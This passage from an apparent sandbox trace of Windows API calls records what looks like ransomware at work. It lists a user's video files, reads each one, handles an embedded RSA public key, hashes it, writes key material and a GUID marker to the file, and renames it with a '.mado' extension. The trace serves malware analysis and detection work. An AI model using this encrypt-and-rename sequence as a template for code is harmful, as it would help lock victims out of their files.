Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.569] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\") returned="-Na1oMmnUTFTw3KDwZd\\" [0205.569] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0205.569] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.570] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.570] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.570] PathFindFileNameW (pszPath="") returned="" [0205.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a4399c0, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xb3c11810, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xb3c11810, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.570] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a4399c0, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xb3c11810, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xb3c11810, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.571] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff2bc510, ftCreationTime.dwHighDateTime=0x1d5dafc, ftLastAccessTime.dwLowDateTime=0x593764b0, ftLastAccessTime.dwHighDateTime=0x1d5e10b, ftLastWriteTime.dwLowDateTime=0x593764b0, ftLastWriteTime.dwHighDateTime=0x1d5e10b, nFileSizeHigh=0x0, nFileSizeLow=0x68d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GeGKz-.mkv", cAlternateFileName="")) returned 1 [0205.571] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\GeGKz-.mkv") returned=".mkv" [0205.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\GeGKz-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\gegkz-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.571] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=26836) returned 1 [0205.571] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.573] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x68ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.573] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.575] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x68d4, lpOverlapped=0x0) returned 1 [0205.575] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.575] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.575] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.575] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.576] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.576] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.576] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.576] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.576] GetLastError () returned 0x0 [0205.576] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.576] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.576] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.576] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.576] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.577] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.577] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x68d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.577] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.577] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.577] CloseHandle (hObject=0x63c) returned 1 [0205.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0205.579] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\GeGKz-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\gegkz-.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\GeGKz-.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\gegkz-.mkv.mado")) returned 1 [0205.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.579] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb048680, ftCreationTime.dwHighDateTime=0x1d5e075, ftLastAccessTime.dwLowDateTime=0x8f00f120, ftLastAccessTime.dwHighDateTime=0x1d5e547, ftLastWriteTime.dwLowDateTime=0x8f00f120, ftLastWriteTime.dwHighDateTime=0x1d5e547, nFileSizeHigh=0x0, nFileSizeLow=0x67a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hx1rv6l-R8BlkwFTYKNO.flv", cAlternateFileName="HX1RV6~1.FLV")) returned 1 [0205.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\hx1rv6l-R8BlkwFTYKNO.flv") returned=".flv" [0205.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\hx1rv6l-R8BlkwFTYKNO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\hx1rv6l-r8blkwftykno.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.585] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1658) returned 1 [0205.585] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.587] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x654, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.587] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.589] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.589] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x67a, lpOverlapped=0x0) returned 1 [0205.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.589] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.590] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.590] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.590] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.590] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.590] GetLastError () returned 0x0 [0205.590] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.590] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.590] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.590] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.590] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x680) returned 0x3b74e80 [0205.590] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66540 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe910 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66588 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe928 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe958 [0205.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 